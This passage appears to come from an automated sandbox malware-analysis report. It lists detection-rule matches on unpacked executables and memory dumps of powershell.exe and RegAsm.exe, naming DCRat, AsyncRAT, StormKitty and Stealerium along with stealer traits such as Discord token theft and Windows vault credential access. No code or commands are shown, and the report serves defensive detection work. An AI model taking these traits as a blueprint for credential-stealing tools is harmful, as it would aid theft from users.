            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 4.2.powershell.exe.277c5710000.12.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 4.2.powershell.exe.277aefa2e20.7.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 4.2.powershell.exe.277aefb4be0.2.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: 4.2.powershell.exe.277ad5d9448.4.raw.unpack, Knvbl.csLong String: Length: 14784
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01553370 NtProtectVirtualMemory,8_2_01553370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01552F19 NtProtectVirtualMemory,8_2_01552F19
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BD3674_2_00007FFD9B8BD367
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B5F804_2_00007FFD9B8B5F80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BBA994_2_00007FFD9B8BBA99
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BEA584_2_00007FFD9B8BEA58
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8BE7F84_2_00007FFD9B8BE7F8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9848954_2_00007FFD9B984895
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_015527968_2_01552796
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01552F198_2_01552F19
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06AE74608_2_06AE7460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06AE00408_2_06AE0040
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277af070e20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277ad61cd00.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277aef9f226.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277ad5d9448.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277ad5d5fbe.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277aefb4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277aef9f226.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277ad5d5fbe.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277bd6d0998.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
